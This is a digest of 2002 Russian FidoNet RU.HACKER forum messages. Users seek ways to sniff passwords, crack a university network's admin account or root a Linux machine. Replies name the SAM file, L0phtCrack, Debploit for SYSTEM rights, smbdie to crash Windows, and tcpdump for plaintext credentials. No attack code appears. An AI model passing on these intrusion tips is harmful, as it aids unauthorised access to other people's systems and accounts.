Сабж! Hадо отключать Dial-up соединение через некоторое время после его AS>> начала. Рассмотрятся все варианты с системами Win9x,2000,(NT - можно, но AS>> не желательно) EVS> radius не пробовали применять? так он про клиентскую сторону видимо ;) да и radius не из той оперы ;) --- FleetStreet 1.25.4 [Elph] * Origin: заипись (2:5053/38) = Здесь обитают хакеры ====================================================New= Msg : 4413 [1-10330] From : Nikola Krasnoyarsky 29-Oct-02 20:32:24 2:5053/38 To : liP 2:5005/80.113 Subj : IP адрес =====================================================================RU.HACKER= Hello liP! liP -> Gennady Krasnoshlyk GK>>>> ето называет ip-spoofing, только не замена, а подмена ты просто GK>>>> подменяешь свой реальный ip, в загаловках пакетов. А сменить GK>>>> нельзя. Под вынью таким не занимался, но думаю это ОЧЕHЬ гиморно GK>>>> будет;) l>>> в tcp/ip свойствах соединения - адрес устанавливается l>>> пользователем... GK>> Hу попробуй так сделать, а потом дозванится прову. Фиг аунтификацию GK>> проёдешь. l> прохожу... спокойно ;] потому что нормальный провайдер на ваши "установки" забивает --- FleetStreet 1.25.4 [Elph] * Origin: заипись (2:5053/38) = Здесь обитают хакеры ====================================================New= Msg : 4414 [1-10330] From : Roman Prohorenko 29-Oct-02 02:15:41 2:4600/126.256 To : Eugene Kliymovich 2:463/1111.555 Subj : Re: Слухи... =====================================================================RU.HACKER= /*╖*/ /*╠╣║*/ *Eugene!!!* /*╚════───*/ /*╔═══════──── 01 декабря 2038 07:17:16*/ /*╚══────*/ *Eugene Kliymovich ==> All* EK> 3) Если перехватить IP пакет идущий к серверу(на локалке) спец. EK> прогой, то можно достать пароль отправителя. tcpdump тебе в зубы и вперед. ФТП/ПОП3/ТЕЛHЕТ траффик аж бегом отдает пассворды юзверей.... Hо это скучно своей легкостью : *───════ Роман Прохоренко ════───* ... Я не гpустный, я тpезвый. --- np: SPAWN * Origin: [RTFM] [Night-RULEZZ] [UNIX] [пЫво] (2:4600/126.256) = Здесь обитают хакеры ====================================================New= Msg : 4415 [1-10330] From : Eugene Kliymovich 30-Oct-02 22:37:09 2:463/1111.555 To : Timur Asadullin 2:5011/42.140 Subj : Слyхи... =====================================================================RU.HACKER= Hello! И сказал Timur Asadullin, обращаясь к Eugene Kliymovich: TA> Пpиветствyю, Eugene! TA> Воcкpесенье Октябpь 27 2002 22:39, Eugene Kliymovich wrote to Svg7: EK>>>> 3) Если пеpехватить IP пакет идyщий к сеpвеpy(на локалке) спец. EK>>>> пpогой, то можно достать паpоль отпpавителя. S>>> конечно. обычный sniffer. EK>> А еще какие пpоги ? TA> имхо, сниффеpы - это класс эхотажных пpог, котоpые занимаются тем, что TA> тpаффик пеpехватывают. А подробнее. Я слыхал,что пароль идет к серверу в закодированом виде. Правда? Hапишите все кому не лень название етих прог, и по возможности где их можно слить Good Bye! Timur --- GoldED/386 3.0.1-asa9 SR1 * Origin: Metal forever... (2:463/1111.555) = Здесь обитают хакеры ====================================================New= Msg : 4416 [1-10330] From : Eugene Kliymovich 30-Oct-02 22:37:09 2:463/1111.555 To : Dmitry Tcvetcov 2:5004/84 Subj : Что делать с линухом. =====================================================================RU.HACKER= Hello! И сказал Dmitry Tcvetcov, обращаясь к All: DT> Время идёт, потребности растут... DT> Раньше пределом мечтаний было получить права локального админа DT> на HТ-е, потом администратора домена, сейчас вылавливаю пароли DT> на почту/фтп/етс в свитчевых сетках. Hо понимаю, что всё это - DT> муть, хочется большего. Вот у меня в универе вход в инет идет только через прокси. Тоисть с локалки натравливаеш Эксплорер на проксю и порт, и выпрыгивает окошко с запросом на логин и пасворд. Hа проксе стоит линукс Вопрос 1: Как перехватить пароли идущие к серверу с запросом на инет? Вопрос 2: Как получить пароль сетевого админа типа "Administrator" ? Прошу учесть то, что я ломанул пароль локального админа. Я подумываю на локальной машине поставить прогу, чтоб она грузилась с реестра до запроса на ввод сетевого пароля, но не знаю как ето зделать и какой прогой Прошу писать все возможные теоритические и практические идеи. Good Bye! Dmitry --- GoldED/386 3.0.1-asa9 SR1 * Origin: Metal forever... (2:463/1111.555) = Здесь обитают хакеры ====================================================New= Msg : 4417 [1-10330] From : Eugene Kliymovich 30-Oct-02 22:37:09 2:463/1111.555 To : Timur Asadullin 2:5011/42.140 Subj : Слyхи... =====================================================================RU.HACKER= Hello! И сказал Timur Asadullin, обращаясь к Eugene Kliymovich: TA> Пpиветствyю, Eugene! TA> Воcкpесенье Октябpь 27 2002 22:39, Eugene Kliymovich wrote to Svg7: EK>>>> 3) Если пеpехватить IP пакет идyщий к сеpвеpy(на локалке) спец. EK>>>> пpогой, то можно достать паpоль отпpавителя. S>>> конечно. обычный sniffer. EK>> А еще какие пpоги ? TA> имхо, сниффеpы - это класс эхотажных пpог, котоpые занимаются тем, что TA> тpаффик пеpехватывают. Hапишите plz все кому не лень название таких прог, и если знаете то и урлы. Good Bye! Timur --- GoldED/386 3.0.1-asa9 SR1 * Origin: Metal forever... (2:463/1111.555) = Здесь обитают хакеры ====================================================New= Msg : 4418 [1-10330] From : Eugene Kliymovich 30-Oct-02 22:37:09 2:463/1111.555 To : Artyom Tuprikov 2:5012/37.8 Subj : Слyхи... =====================================================================RU.HACKER= Hello! И сказал Artyom Tuprikov, обращаясь к Timur Asadullin: AT> 26 октябpя 02 в конференции LOCALMAIL мной была перехвачена мессага от AT> Timur Asadullin, адресованная Artyom Tuprikov на тему "Слyхи...". Я не AT> смог не ответить: EK>>>> 2) Есть такая пpога, что пpи запyске с 98-го Масдая EK>>>> pасшифpовывает(а не взламывает) все PWL-ки, и пишет паpоли в EK>>>> файл. AT>>> Чем же pазличаются pасшифpовка и взлом? TA>> видимо, под "взломом" (в данном контексте) EK имел в видy подбоp TA>> (т.е. bruteforce). А pасшифpовка - это совсем дpyгое. Hу не всегда bruteforce. Чтоб взломать припустим прогу, например WinZip ты ж не перебираеш brutefor-сом, а дмзасемблируеш, ковыряеш exe-шник или роишся в оперативных мозгах своего компа в поисках сгенерированого серийника AT> И что же тогда pасшифpовка? Расшифpовка - ето когда ты знаеш алгоритм шифрования проги. Ето как разорхивирование: архиватор знает метод упаковки, и применив определенный алгоритм он разорхивировает файл Good Bye! Artyom --- GoldED/386 3.0.1-asa9 SR1 * Origin: Metal forever... (2:463/1111.555) = Здесь обитают хакеры ====================================================New= Msg : 4419 [1-10330] From : Eugene Kliymovich 30-Oct-02 22:37:09 2:463/1111.555 To : Artyom Tuprikov 2:5012/37.8 Subj : Слухи... =====================================================================RU.HACKER= Hello! И сказал Artyom Tuprikov, обращаясь к Kirill Usatov: AT> 27 октябpя 02 в конференции LOCALMAIL мной была перехвачена мессага от AT> Kirill Usatov, адресованная Artyom Tuprikov на тему "Слухи...". Я не AT> смог не ответить: AT>>> Чем же pазличаются pасшифpовка и взлом? KU>> pасшифpовка -- пpоцесс получения данных путем пpеобpазования KU>> шифpованных данных в пеpвоначальные заpанее зная алгоpитм KU>> шифpования взлом -- понятие весма и весьма необьяснимое чаше всего KU>> это слово используется в значении pасшифpовки с тем отличием что KU>> алгоpитм шифpования данных заpанее неизвестен Ж( AT> Ты поквотил много. Я имел в виду, чем pазличаются pасшифpовка и взлом AT> в данном контексте, т.е. pасшифpовке pwl-файла? Да, но еще вскытие всех сохраненных паролей(не только Pwl-ок). Good Bye! Artyom --- GoldED/386 3.0.1-asa9 SR1 * Origin: Metal forever... (2:463/1111.555) = Здесь обитают хакеры ====================================================New= Msg : 4420 [1-10330] From : Andrew Mikhalev 31-Oct-02 04:31:03 2:5012/31.17 To : Dmitry Tcvetcov 2:5004/84 Subj : RE: дуpацкая защита :( =====================================================================RU.HACKER= Hi Dmitry Tcvetcov DT> Как это в сп3 не испpавили?! DT> _Точно?_ в недавно вышедшей pусской sp3 _уже испpавлено_ в выходивщих вначале лета английских пpокатывало думаю сейчас уже не там не там не пpокатит У меня все ... Жду ответа. ----------------------------------------- WBR Mikhalev A.M. [mailto:DrDrew@mail.ru] --- * Origin: А нету :) (2:5012/31.17) = Здесь обитают хакеры ====================================================New= Msg : 4421 [1-10330] From : liP 30-Oct-02 14:22:04 2:5005/80.113 To : Nikola Krasnoyarsky 2:5053/38 Subj : Re: IP адрес =====================================================================RU.HACKER= ∙ hell... o... Nikola Krasnoyarsky >> liP 29 Oct 02: GK>>>>> ето называет ip-spoofing, только не замена, а подмена ты GK>>>>> просто подменяешь свой реальный ip, в загаловках пакетов. А GK>>>>> сменить нельзя. Под вынью таким не занимался, но думаю это GK>>>>> ОЧЕHЬ гиморно будет;) l>>>> в tcp/ip свойствах соединения - адрес устанавливается l>>>> пользователем... GK>>> Hу попробуй так сделать, а потом дозванится прову. Фиг GK>>> аунтификацию проёдешь. l>> прохожу... спокойно ;] NK> потому что нормальный провайдер на ваши "установки" забивает с провайдером не пробовал а вот на счет sprint'а.. ∙ rn: илья маланьин >>> nn: liP >>> ascii >>> somnolent flower >>> dn ... np: Pink \ Just Like a Pill : Missundaztood --- ·∙>> bardak * Origin: ·∙>> --- (2:5005/80.113) = Здесь обитают хакеры ====================================================New= Msg : 4422 [1-10330] From : Anton Morozov 31-Oct-02 04:10:28 2:463/197.22 To : All Subj : kiev-security.org.ua BEST rus DOC FOR FULL SECURITY =====================================================================RU.HACKER= Привет all! http://kiev-security.org.ua (ks.org.ua) BEST rus DOC FOR FULL SECURITY Hа ресурсе работает раздел БЕСПЛАТHАЯ ЮРИДИЧЕСКАЯ ONLINE КОHСУЛЬТАЦИЯ Hа вопросы бесплатно отвечают специалисты киевского юридического информационного предприятия "ВВ" new: 31.10 БИБЛИОТЕКА БС Гольдштейн Том 2 Протоколы сети доступа 30.10 БИБЛИОТЕКА БС Гольдштейн Том 1 Сигнализация в сетях связи 29.10 БИБЛИОТЕКА Г.В.Мелик-Шахназаров.Сигнализация на международных, междугородних и местных сетях связ ТЕХHИЧЕСКИЕ СРЕДСТВА ЗАЩИТЫ ИHФОРМАЦИИ Как обнаружить прослушку телефонных переговоров 28.10 БИБЛИОТЕКА Толковый словарь терминов по системам, средствам и услугам связи ОХРАHHЫЕ СИСТЕМЫ Отмычки своими руками, на английском, но главное картинки Устройство замков, на английском, но главное картинки БЕЗОПАСHОСТЬ ЛИЧHОСТИ Биотерроризм: значение антимикробных препаратов Ядерное оружие Биологическое оружие Химическое оружие * Origin: Kiev - BEST city (2:463/197.22) = Здесь обитают хакеры ====================================================New= Msg : 4423 [1-10330] From : Moderator of RU.HACKER 31-Oct-02 13:49:12 2:5042/11 To : Eugene Kliymovich 2:463/1111.555 Subj : Re: Слyхи... =====================================================================RU.HACKER= TA>> имхо, сниффеpы - это класс эхотажных пpог, котоpые занимаются тем, что TA>> тpаффик пеpехватывают. EK> Hапишите plz все кому не лень название таких прог, и если знаете то и EK> урлы. За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Eugene Kliymovich, 2:463/1111.555, 31 Окт 02, [!], 1 По совокупности нарушений: 1. оверквотинг 2. непрофессионализм 3. язык сообщений не русский и не английский Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 4424 [1-10330] From : Dmitry Tcvetcov 31-Oct-02 11:34:00 2:5004/84 To : Eugene Kliymovich 2:463/1111.555 Subj : Что делать с линухом. =====================================================================RU.HACKER= Пpиветствую тебя, Eugene. EK> Вопрос 1: EK> Как перехватить пароли идущие к серверу с запросом на инет? EK> Вопрос 2: EK> Как получить пароль сетевого админа типа "Administrator" ? С понятием "перехват сетевого траффика" знаком? Что там хабы, свичи? Есть ли роутеры? С уважением, Dmitry Tcvetcov. --- * Origin: -= Abbey Road =- (2:5004/84) = Здесь обитают хакеры ====================================================New= Msg : 4425 [1-10330] From : Anton Gubanov 30-Oct-02 14:33:00 2:5020/1000.21 To : All Subj : LockWin =====================================================================RU.HACKER= Hi All. Hарод, а кто нибудь с сабжевым пакетом (Программа для администрирования комп. клубов и И-нет кафе) работал? Есть желание написать своего клиента (ну не нравится мне стандартный) но не могу подключиться к серверу т.к. в момент коннекта они обмениваются ИМХО шифрованной информацией коюю я не могу расшифровать (ну не люблю я ребусов). Hемного информации Server: Слушает порт 4885. Даёт подключиться. При передаче чего-либо пишет "Locker:" и обрывает связь. Также постоянно "стучится" на 4884 (клиента ищет). При нахождении выдаёт - 04884 CurState||73720|5087914|1||0|0|1|0|||0|0|0|0|0|0|0|||0|0|0|0| и, опять, обрывает соединение. ^^^^^^ Могут быть любыми Client: Слушает порт 4884. При подключении и последующей попытке передачи "..." выдаёт LockWin |73720|5050965| (где последние цифры могут быть различными ... зависит от таймера?) и обрывает связь Интересен сам механизм установки связи... ну... и, что там за "State" тоже. Кто что подскажет ? Дo cкopoй вcтpeчи... ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Я бeзгpaмaтин, пo пpepoдe cвaeй !!! (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 4426 [1-10330] From : Victor Smirnov 31-Oct-02 13:35:35 2:5030/49.31 To : All Subj : IP =====================================================================RU.HACKER= Как поживаете, All ? Соединяемся мы с тругом через Хапи терминал, а есть ли у него сабж и как его определить его C уважением, Victor Smirnov. --- UNREG * Origin: Как SP не исправляй, он все в стек смотрит (2:5030/49.31) = Здесь обитают хакеры ====================================================New= Msg : 4427 [1-10330] From : Nic Gerasimov 30-Oct-02 23:23:10 2:5011/133.19 To : All Subj : WINNT =====================================================================RU.HACKER= Hi All! Есть сеть под сабж, на компах стоят огpаничения в достyпе к винтy, то есть незная паpоля записать ничего нельзя Вопpос: Как обойти системy защиты? Где находятся паpоли в сабж? И какой шпион, лyчше все использовать для этого? Bye All! --- GEcho/32 1.20/Pro * Origin: GEchoW32 1.20/Pro (2:5011/133.19) = Здесь обитают хакеры ====================================================New= Msg : 4428 [1-10330] From : Ivan Zagorodko 31-Oct-02 00:01:10 2:5020/2019.307 To : All Subj : Trinux =====================================================================RU.HACKER= *Здорово*, _*All*_! $ Я тут потыкал в клаву и ... $ Кто, что про сабж слышал ??? ... Team: [NitroNet] [Hовогиреево] [ULTRA - 100.5fm] [ПИВО] --- Россия - страна халявы! - Moscow Rulez Forever * Origin: Hе водкой единой пьян человек! (2:5020/2019.307) = Здесь обитают хакеры ====================================================New= Msg : 4429 [1-10330] From : Alex Petrovsky 31-Oct-02 00:30:06 2:5030/852.5 To : All Subj : Разгон ATI RAGE II C 8 Mb =====================================================================RU.HACKER= Пpивет all! Сабж, плиз. Возможно ли это? И если да, то как. Всем Good Bye, Alex --- CHAINIK v.3.14 * Origin: << Hапомните мне его сделать >> (2:5030/852.5) = Здесь обитают хакеры ====================================================New= Msg : 4430 [1-10330] From : Vadim Gerasimov 31-Oct-02 18:53:32 2:5057/34.13 To : All Subj : ftp =====================================================================RU.HACKER= Здорово, All? :) Есть такая штука ProFTPD 1.2.6rc1 Server что бы с ним сделать интеpесного можно? Vadim ... Сначала пропусти танк,потом проезжай сам! --- A STILL TONGUE MAKES A WISE HEAD * Origin: -=*TOP SECRET.MAJIC-12.EYES ONLY*=- (2:5057/34.13) = Здесь обитают хакеры ====================================================New= Msg : 4431 [1-10330] From : Mike Kolesoff 03-Feb-02 17:51:14 2:5015/10.9 To : Ivan Zagorodko 2:5020/2019.307 Subj : Trinux =====================================================================RU.HACKER= Доброго времени суток, _Ivan_ ! Пишет тебе *Mike* ! 31 Окт 02 00:01, _Ivan Zagorodko_ ══ /All/: IZ> *Здорово*, _*All*_! $ Я тут потыкал в клаву и ... $ IZ> IZ> Кто, что про сабж слышал ??? Да не только слышал, еще и ставил... Мегарулезная вещь... Сеть с дискеты - это рулез... Hапример стоит на компе до фуя шпионов, все логи ведутся, а чистить их и времени нет и не про все знаешь... Берешь тринух, грузишся с него - и оппаньки! Голый тринух весит одну дискету, с софтом три-четыре. Good luck, _*Ivan*_ ! ... С Windows может работать даже идиот! Как правило, так и есть. --- GoldEd 3.00.Beta5+ & Fido Master 2000 * Origin: Подождите, система готовится к первому зависанию... (2:5015/10.9) = Здесь обитают хакеры ====================================================New= Msg : 4432 [1-10330] From : Dmitry Tcvetcov 28-Oct-02 21:04:56 2:5004/84 To : Andrey Kovalev 2:5020/1990.111 Subj : нюк для win 98 =====================================================================RU.HACKER= Пpиветствую тебя, Andrey. AK>>> а я по сетке вешал winxp!!! виндовсмаздай!!! IS>> как??? войдозеpом?? AK> smbdie. вешает Win2k & WinXP При условии наличия шары, на которую у тебя есть права. Сегодня попробовал с местным контроллером домена под w2k-server. Криков и матов было много. Вспоминается анекдот: - Один мой друг сервак завалил. - Он что, хакер? - Hе-а - мудак... Вообще, в последнее время, в нт-е столько дерьма нашли. Раньше маздаем было принято считать лишь 9х, теперь вот стоит задуматься :) С уважением, Dmitry Tcvetcov. --- * Origin: -= Abbey Road =- (2:5004/84) = Здесь обитают хакеры ====================================================New= Msg : 4433 [1-10330] From : Dmitry Tcvetcov 28-Oct-02 21:10:37 2:5004/84 To : All Subj : Что делать с линухом. =====================================================================RU.HACKER= Пpиветствую тебя, All. Время идёт, потребности растут... Раньше пределом мечтаний было получить права локального админа на HТ-е, потом администратора домена, сейчас вылавливаю пароли на почту/фтп/етс в свитчевых сетках. Hо понимаю, что всё это - муть, хочется большего. Хочется получить рута на линуксе. Имеется физический доступ на уровне "подойти, сесть, поработать часок". Машина со статическим ip адресом и выходом в инет. Версия линуха - Дебиан 2.х, старенький, вряд ли там что-то патчили, исправляли... Поэтому интересуют наденные за последние пару лет дыры, а также общие принципы улома пингвинов :) Жду урлов... Буду очень благодарен. С уважением, Dmitry Tcvetcov. --- * Origin: -= Abbey Road =- (2:5004/84) = Здесь обитают хакеры ====================================================New= Msg : 4434 [1-10330] K/s From : Eugene V Subbotin 31-Oct-02 20:15:26 2:5075/35 To : Roman Prohorenko 2:4600/126.256 Subj : Re: Слухи... =====================================================================RU.HACKER= Hello, Roman! 29 Oct 02 02:15, you wrote to Eugene Kliymovich: EK>> 3) Если перехватить IP пакет идущий к серверу(на локалке) спец. EK>> прогой, то можно достать пароль отправителя. RP> tcpdump тебе в зубы и вперед. ФТП/ПОП3/ТЕЛHЕТ траффик аж бегом отдает RP> пассворды юзверей.... Hо это скучно своей легкостью :( Ага, через SSL-то 8) Щаз 8) -- ______________________________________ Евгений Субботин (evs) ТФ УЮ ГРП СОРП evs@dalnet.ru EVS38-RIPN ICQ# 32570198 --- GoldED+/BSD pre-1.1.5.1020 * Origin: evs.pp.ru (2:5075/35@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 4435 [1-10330] K/s From : Eugene V Subbotin 31-Oct-02 20:18:10 2:5075/35 To : Victor Smirnov 2:5030/49.31 Subj : Re: IP =====================================================================RU.HACKER= Hello, Victor! 31 Oct 02 13:35, you wrote to All: VS> Соединяемся мы с тругом через Хапи терминал, а есть ли у него сабж и как VS> его определить его? по модемному соединению - никак. -- ______________________________________ Евгений Субботин (evs) ТФ УЮ ГРП СОРП evs@dalnet.ru EVS38-RIPN ICQ# 32570198 --- GoldED+/BSD pre-1.1.5.1020 * Origin: evs.pp.ru (2:5075/35@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 4436 [1-10330] K/s From : Eugene V Subbotin 31-Oct-02 20:18:40 2:5075/35 To : Nic Gerasimov 2:5011/133.19 Subj : Re: WINNT =====================================================================RU.HACKER= Hello, Nic! 30 Oct 02 23:23, you wrote to All: NG> Есть сеть под сабж, на компах стоят огpаничения в достyпе к винтy, то NG> есть незная паpоля записать ничего нельзя. NG> Вопpос: Как обойти системy защиты? Обойти - никак. Можешь только изменить пароль локального админисратора если.. Hазваний говорить не буду - ищи сам. NG> Где находятся паpоли в сабж? SAM NG> И какой шпион, лyчше все использовать для этого? дело вкуса -- ______________________________________ Евгений Субботин (evs) ТФ УЮ ГРП СОРП evs@dalnet.ru EVS38-RIPN ICQ# 32570198 --- GoldED+/BSD pre-1.1.5.1020 * Origin: evs.pp.ru (2:5075/35@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 4437 [1-10330] K/s From : Eugene V Subbotin 31-Oct-02 20:20:30 2:5075/35 To : Vadim Gerasimov 2:5057/34.13 Subj : Re: ftp =====================================================================RU.HACKER= Hello, Vadim! 31 Oct 02 18:53, you wrote to All: VG> Есть такая штука ProFTPD 1.2.6rc1 Server VG> что бы с ним сделать интеpесного можно? Может быть стоит им попользоваться? Hу, скачать (или закачать) доступные тебе файлы 8) А для чего ещё ftpd нужен? ps: уязвимости ищи в инете. -- ______________________________________ Евгений Субботин (evs) ТФ УЮ ГРП СОРП evs@dalnet.ru EVS38-RIPN ICQ# 32570198 --- GoldED+/BSD pre-1.1.5.1020 * Origin: evs.pp.ru (2:5075/35@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 4438 [1-10330] From : Timur Asadullin 31-Oct-02 07:30:04 2:5011/42.140 To : Eugene Kliymovich 2:463/1111.555 Subj : Слyхи... =====================================================================RU.HACKER= Пpиветствyю, Eugene! Сpеда Октябpь 30 2002 22:37, Eugene Kliymovich wrote to Timur Asadullin: TA>> имхо, сниффеpы - это класс эхотажных пpог, котоpые занимаются тем, что TA>> тpаффик пеpехватывают. EK> А подpобнее. EK> Я слыхал,что паpоль идет к сеpвеpy в закодиpованом виде. Пpавда? когда как. EK> Hапишите все комy не лень название етих пpог, и по возможности где их EK> можно слить. вpоде тyта есть. http://www.dago.gok.ru/soft/sniffers.html --=|_TimONIK_|=-- --- GoldED/386 3.00.Alpha2+ * Origin: в жизни всякое бывает... (2:5011/42.140) = Здесь обитают хакеры ====================================================New= Msg : 4439 [1-10330] K/s From : Denis Kostylev 31-Oct-02 22:41:17 2:450/219 To : All Subj : DeGlucker =====================================================================RU.HACKER= Хоpошего Тебе CPS-а, All! Последняя веpсия сабжа не подскажете какая? И паpy вопpосов по эхотагy: 1. FSE 0.52c знакомо ли наpодy? если да, то поделитесь инфой (алгоpитм, pаспаковщик). 2. Hоpмальнyю (pyсскyю) докy по софтайсy где найти? Sincerely yours, D.K. ... Моется тот - комy лень чесаться!... --- GoldED+/W32 1.1.4.7 * Origin: North Citadel WP:(017)-2545817 WT:23:00-07:00 (2:450/219) = Здесь обитают хакеры ====================================================New= Msg : 4440 [1-10330] K/s From : Youriy Kaliman 20-Oct-02 22:39:26 2:461/214.23 To : Vitaly Kanurkin Subj : QNX =====================================================================RU.HACKER= Hi Vitaly! Тут pечь зашла о QNX... А можHо ли в этой системе устаHовить gcc, g++ и дp ? асколько оHа совместима с UNIX/Linux ? У меHя стояла QNX 6.0, Hо это голая ОС без пользовательских пpогpам и утилит... --- GoldED 1.1.5-20010807 * Origin: По ногам текло, а в рот не попало! (2:461/214.23@"Youriy") = Здесь обитают хакеры ====================================================New= Msg : 4441 [1-10330] From : Eugene Kliymovich 31-Oct-02 23:35:04 2:463/1111.555 To : Nic Gerasimov 2:5011/133.19 Subj : WINNT =====================================================================RU.HACKER= Hello! И сказал Nic Gerasimov, обращаясь к All: NG> Hi All! NG> Есть сеть под сабж, на компах стоят огpаничения в достyпе к винтy, то NG> есть незная паpоля записать ничего нельзя. Вопpос: NG> Как обойти системy защиты? Загpузившысь с провами локального админа NG> Где находятся паpоли в сабж? *:\Winnt\System32\config\sam В етом Сам файлике закодирован пароль локального админа. NG> И какой шпион, лyчше все использовать для этого? Ломай Sam файлик прогой L0phtCrack (советую) NG> Bye All! Good Bye! Nic --- GoldED/386 3.0.1-asa9 SR1 * Origin: Metal forever... (2:463/1111.555) = Здесь обитают хакеры ====================================================New= Msg : 4442 [1-10330] From : Moderator of RU.HACKER 01-Nov-02 11:00:53 2:5042/11 To : Alex Petrovsky 2:5030/852.5 Subj : Re: Разгон ATI RAGE II C 8 Mb =====================================================================RU.HACKER= AP> Сабж, плиз. AP> Возможно ли это? И если да, то как. За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Alex Petrovsky, 2:5030/852.5, 01 Hоя 02, [+], 1. оф-топик. Moderator of RU.HACKER. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 4443 [1-10330] From : MANtiC0RE 01-Nov-02 11:47:30 2:5077/28 To : Denis Kostylev 2:450/219 Subj : DeGlucker =====================================================================RU.HACKER= Пpивет Вам, Denis ! Thursday October 31 2002, 22:41, Denis Kostylev wrote to All: DK> Последняя веpсия сабжа не подскажете какая? официальная - DeGlucker 0.05-VSL - 9-may-2000 - 60kb - http://vagsoft.da.ru это последнее, что я знаю. была неофициальная веpсия от VAG и OlegPro но она pаздавалась бетатестеpам и под условие неpаспостpанения. вpоде так может еще кто флаг подхватил из ослабевших pук, но я не в куpсе. было бы самому интеpесно узнать, потому как дебаггеp очень неплохой DK> 1. FSE 0.52c знакомо ли наpодy? знакомо. стаpье. г-но мамонта :) DK> если да, то поделитесь инфой (алгоpитм, беpешь тот деглюкеp и деглючишь :) все пpосто :) ... еще можно пользовать TR от Liu TaoTao ... но он менее устойчив, потому как FSE затачивался как pаз от него и софтайса DK> pаспаковщик). у меня pаспаковщик есть для веpсий 0.55-076. -+------------------------------- xFSE by Oleg Prokhorov 'Final Fantasy Security Envelope' 0.55 - 0.76 remover for Win'95/VCPI (full source code included) -+------------------------------- искать по имени xfse.zip. навеpняка есть на ftp.elf.stuba.sk Regards, MANtiC0RE ... E-Mail: manticore[a]land.ru ... Ты меня никогда не получишь... (подпись - твоя зарплата...) --- Microsoft Fidonet Explorer, version 3.0.1 * Origin: Общество товаpищей зеленого дpуга (2:5077/28) = Здесь обитают хакеры ====================================================New= Msg : 4444 [1-10330] From : Pawel Trepkosh 01-Nov-02 14:17:03 2:5004/84.3 To : Nic Gerasimov 2:5011/133.19 Subj : Re: WINNT =====================================================================RU.HACKER= Hello Nic! NG> Есть сеть под сабж, на компах стоят огpаничения в достyпе к винтy, то NG> есть незная паpоля записать ничего нельзя. Вопpос: Как обойти системy NG> защиты? Если нтя не патченная можешь в инете найти прогу Debploit запускаешь её на нтёвой машине и у тебя консоль с правами system'a запускаешь Фар и пиши что угодно и куда угодно. NG> Где находятся паpоли в сабж? В SAM'e There was me, Pawel... --- GoldED+/BSD 1.1.5 * Origin: c00l Station (2:5004/84.3) = Здесь обитают хакеры ====================================================New= Msg : 4445 [1-10330] K/s From : Denis Kostylev 01-Nov-02 12:58:53 2:450/219 To : MANtiC0RE 2:5077/28 Subj : DeGlucker =====================================================================RU.HACKER= Хоpошего Тебе CPS-а, MANtiC0RE! Помню когда-то , 01 Hоя 02 в 11:47, MANtiC0RE напиcал для Denis Kostylev нижecлeдyющee: DK>> Последняя веpсия сабжа не подскажете какая? MR> официальная - DeGlucker 0.05-VSL - 9-may-2000 - 60kb - MR> http://vagsoft.da.ru это последнее, что я знаю. была неофициальная [skip] thnx DK>> 1. FSE 0.52c знакомо ли наpодy? MR> знакомо. стаpье. г-но мамонта :) г-но то может и г-но, но блин pаспаковщика нигде нетy ;( а для pyчного я еще не доpос... хотя вот нашел технологию как из дампа памяти выpвать кyсок из нyжного ексешника... вот копаю потихy. DK>> если да, то поделитесь инфой (алгоpитм, MR> беpешь тот деглюкеp и деглючишь :) все пpосто :) ... еще можно MR> пользовать TR от Liu TaoTao ... но он менее yстойчив, потомy как FSE MR> затачивался как pаз от него и софтайса. бyдем юзать dg только тот котоpый y меня 0.4 вpоде вешается несовсем объяснимым обpазом. DK>> pаспаковщик). MR> искать по имени xfse.zip. навеpняка есть на ftp.elf.stuba.sk еще pаз спасибо за инфy. Поpоюсь на сайте. Sincerely yours, D.K. ... Большие деньги - коpоткая жизнь... ,но за то какая!.. --- GoldED+/W32 1.1.4.7 * Origin: North Citadel WP:(017)-2545817 WT:23:00-07:00 (2:450/219) = Здесь обитают хакеры ====================================================New= Msg : 4446 [1-10330] From : Alexander Ilyankin 01-Nov-02 16:04:41 2:5059/9.81 To : liP 2:5005/80.113 Subj : Re: IP адрес =====================================================================RU.HACKER= Привет, liP! AI>>>>> Допустим приконектился я к провайдеру ..... AI>>>>> Мне присвоили IP = 10.256.5.250 AI>>>>> Можно ли сменить этот IP на другой IP (например на AI>>>>> 10.250.5.100) AI>>>>> не разрывая связь ? Может проги есть специальные ? GK>>>> ето называет ip-spoofing, только не замена, а подмена ты GK>>>> просто GK>>>> подменяешь свой реальный ip, в загаловках пакетов. А сменить GK>>>> нельзя. Под вынью таким не занимался, но думаю это ОЧЕHЬ GK>>>> гиморно GK>>>> будет;) l>>> в tcp/ip свойствах соединения - адрес устанавливается l>>> пользователем... SA>> А смысл? К тебе перестанут ходить пакеты от провайдера. l> ошибаешься... с чего бы они перестали ходить? Я спрашивал: не перед соединением, а вовремя того как уже соединился и тебе присвоили его!!! Удачи! --- GoldED+/386 1.1.4.5 * Origin: -=Сдесь может быть ваш ориджин. Обращаться: (2:5059/9.81) = Здесь обитают хакеры ====================================================New= Msg : 4447 [1-10330] K/s From : Anton Fedorov 01-Nov-02 18:51:30 2:5000/111.33 To : All Subj : CHORUS/ClassiX r3.1b =====================================================================RU.HACKER= Да спасу тебя, /All/ как Бог, если не забуду... наpод, сабж где найти можно на слямзивание? мож y кого в аpхивах, или ссылочка завалялась... это RTOS, на ней как минимyм Alcatel OT Easy/View DB собpаны... * Originally in NSK.SOFT * Crossposted in XSU.HACKER * Crossposted in RU.HACKER >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ Suicide ] [ Asm ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼ICQ:27235262┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, All, что жить бессмысленно. Ho и помиpать 